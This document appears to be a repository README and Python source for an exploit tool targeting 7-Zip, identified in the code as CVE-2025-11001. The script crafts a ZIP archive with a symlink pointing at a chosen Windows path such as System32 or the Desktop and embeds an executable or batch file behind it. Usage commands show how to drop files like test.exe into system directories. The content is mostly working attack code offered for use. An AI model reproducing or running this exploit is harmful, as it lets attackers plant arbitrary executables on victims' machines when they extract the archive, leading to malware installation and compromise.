git clone <repository-url>cd 7zip-exploit-tool

python --version

# 基本用法：创建一个指向桌面的符号链接，并嵌入calc.exe文件python3 exploit.py -t "C:\Users\pac\Desktop" -o demo.zip --data-file calc.exe

# 测试向系统目录写入文件python3 exploit.py -t "C:\Windows\System32" -o test.zip -f test.exe

# 使用自定义目录和链接名称python3 exploit.py -t "C:\ProgramData" -o custom.zip -f script.bat --dir-name malware --link-name entry

import argparseimport osimport timeimport zipfile
def add_dir(z, arcname):    """    向ZIP文件中添加目录条目        参数:    z: ZipFile对象    arcname: 归档中的目录路径    """    if not arcname.endswith('/'):        arcname += '/'    zi = zipfile.ZipInfo(arcname)    zi.date_time = time.localtime(time.time())[:6]    zi.create_system = 3  # Unix系统标识    zi.external_attr = (0o040755 << 16) | 0x10  # 目录权限属性    zi.compress_type = zipfile.ZIP_STORED  # 不压缩    z.writestr(zi, b'')  # 写入空内容作为目录
def add_symlink(z, arcname, target):    """    向ZIP文件中添加符号链接        参数:    z: ZipFile对象    arcname: 归档中的符号链接路径    target: 符号链接指向的目标路径    """    zi = zipfile.ZipInfo(arcname)    zi.date_time = time.localtime(time.time())[:6]    zi.create_system = 3  # Unix系统标识    zi.external_attr = (0o120777 << 16)  # 符号链接权限属性    zi.compress_type = zipfile.ZIP_STORED  # 不压缩    z.writestr(zi, target.encode('utf-8'))  # 写入目标路径作为链接内容
def add_file_from_disk(z, arcname, src_path):    """    从磁盘读取文件并添加到ZIP        参数:    z: ZipFile对象    arcname: 归档中的文件路径    src_path: 源文件的本地路径    """    with open(src_path, 'rb') as f:        payload = f.read()  # 读取文件内容    zi = zipfile.ZipInfo(arcname)    zi.date_time = time.localtime(time.time())[:6]    zi.create_system = 3  # Unix系统标识    zi.external_attr = (0o100644 << 16)  # 普通文件权限属性    zi.compress_type = zipfile.ZIP_STORED  # 不压缩    z.writestr(zi, payload)  # 写入文件内容
def main():    """    主函数：解析参数并创建特制ZIP文件    """    parser = argparse.ArgumentParser(        description="Crafts a zip that exploits CVE-2025-11001."    )    parser.add_argument(        "--zip-out", "-o",        required=True,        help="Path to the output ZIP file."    )    parser.add_argument(        "--symlink-target", "-t",        required=True,        help="Destination path the symlink points to - specify a \"C:\" path"    )    parser.add_argument(        "--data-file", "-f",        required=True,        help="Path to the local file to embed e.g an executable or bat script."    )    parser.add_argument(        "--dir-name",        default="data",        help="Top-level directory name inside the ZIP (default: data)."    )    parser.add_argument(        "--link-name",        default="link_in",        help="Symlink entry name under the top directory (default: link_in)."    )    args = parser.parse_args()
    # 构建ZIP中的路径结构    top_dir = args.dir_name.rstrip("/")    link_entry = f"{top_dir}/{args.link_name}"    embedded_name = os.path.basename(args.data_file)    file_entry = f"{link_entry}/{embedded_name}"
    # 创建ZIP文件并添加内容    with zipfile.ZipFile(args.zip_out, "w") as z:        add_dir(z, top_dir)  # 添加顶层目录        add_symlink(z, link_entry, args.symlink_target)  # 添加符号链接        add_file_from_disk(z, file_entry, args.data_file)  # 添加数据文件
    print(f"Wrote {args.zip_out}")
if __name__ == "__main__":    main()